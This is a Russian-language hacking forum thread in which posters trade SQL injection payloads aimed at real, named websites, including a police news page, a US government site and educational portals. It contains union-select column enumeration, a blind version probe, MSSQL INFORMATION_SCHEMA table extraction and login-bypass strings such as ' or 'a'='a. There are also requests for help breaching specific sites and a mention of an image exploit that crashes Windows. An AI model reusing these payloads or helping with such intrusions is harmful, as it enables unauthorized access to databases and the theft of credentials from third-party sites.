Вобще этот сплоит создает картинку Art.gif которая при ее загрузке вызывает DOS но этот сплоит немного исправить надо (под винду) а в целом действуй так, как посоветовал n1†R0x, только вот по идее когда ты сам картинку будешь смотреть у тебя винда уйдет в аут... вопрос: зачем он тебе нужен?
нашел количество полей - пытаюсь вывести бд ругается....... http://www.suvd.ru/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
там 3 версия мускула, а внем union select не работает... Code: http://www.suvd.ru/news.php?id=4825%20and%20ascii(lower(substring(Version(),1,1)))=51/* ascii("3")=51
тут сайтец с скуль уязвимостью... http://www.mediacomp.ru/?action=sub_kat&top_kat=-1,union+select+1/* самое ссмешное то что я подобрал до 72 и нифига ничего не вылезло.... что предложите сделать ....?
то есть ты хочешь сказать что истина полюбе есть, тока находится далеко и мою работу облегчит данная фича?? или как??
http://www.mediacomp.ru/?action=sub_kat&top_kat=-1+union+select+1,2,3/* http://www.mediacomp.ru/?action=sub_kat&top_kat=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71)/*
вторая ссылка не пашет , до первой странно, почему я ее пропустил ппц. я даже удивился ))) но повторюсь вторая ссылка полюбе версию не показывает...
Балбес - вторая пашет просто там пробел между скобками и version (в переносах возникают пробелы при посте)
Ты просто минимум не понимаешь ... даже такие мелочи как было сказано выше - это просто уже выносит на грубость...
http://www.usgs.gov/newsroom/article.asp?ID=1' Помогите провести инъект на сайте. У меня с MSSQL пока туговато... http://ts.edu.ru/schools/region/4/?town=%C4' и здесь... uralsmart.ru Опять таки mssql. Я вижу что скл ругается ......еще вижу строки логин пасс и ввожу запрос типа: ' or 'a'='a " or 1=1-- or 1=1-- а тока ругается -ХЕЛП
Code: http://ts.edu.ru/schools/region/4/?town=1'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)-- а вобще читай здесь http://forum.antichat.ru/thread30501.html отлично написано
